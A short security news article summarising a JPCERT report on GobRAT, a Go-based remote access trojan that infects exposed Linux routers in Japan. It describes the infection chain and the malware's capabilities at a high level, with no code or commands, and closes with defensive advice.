A new Golang-based RAT called GobRAT has been targeting Linux routers in Japan, perhaps by exploiting known vulnerabilities. It is equipped with a wide range of capabilities and targets a wide range of architectures, including x86, x86-64, ARM, and MIPS.
The GobRAT operation
The JPCERT Coordination Center has published a report, confirming that the GobRAT has been infecting routers in Japan since February.
The attack begins with an open scan for the routers having WEBUI exposed to the public.
It attempts intrusion by possibly exploiting some known vulnerabilities and then initiating a chain of infection by executing several scripts.
The first one is a Loader Script, that disables the firewall, downloads the GobRAT, and creates and executes additional scripts including a Start Script and a Daemon Script.
The Start Scriptexecutes the GobRAT, masquerading as the Apache daemon process (apached). The Daemon Scriptensures that the Start Script is running, by checking its status every 20 seconds.
Deep dive into GobRAT
GobRAT is packed with UPX v4 series and uses TLS to communicate with its server.
Upon infection, it scans the infected machine to obtain the IP address and MAC address, total uptime, and status of the network communication.
In the source code, the C2 string and the Linux commands are encrypted. It uses AES128 CTR mode to decrypt the strings.
It supports a list of 22 commands to perform various tasks, including obtaining machine information, reading and writing files, initiating SOCKS5 socket, and executing the reverse shell.
It further attempts to log in to Telnet, SSHD, MySQL, Redis, and PostgreSQL services running on other machines across the network.
Concluding thoughts
GobRAT is yet another Golang-based malware, attempting to exploit the routers exposed to the internet. Leaving organizational assets exposed to the internet without proper security checks is an open invitation to GobRAT and other threats scanning the public and private internet space. To stay secure, organizations are recommended to implement ample proactive defense mechanisms, such as firewalls, and perform regular audits of their online infrastructure.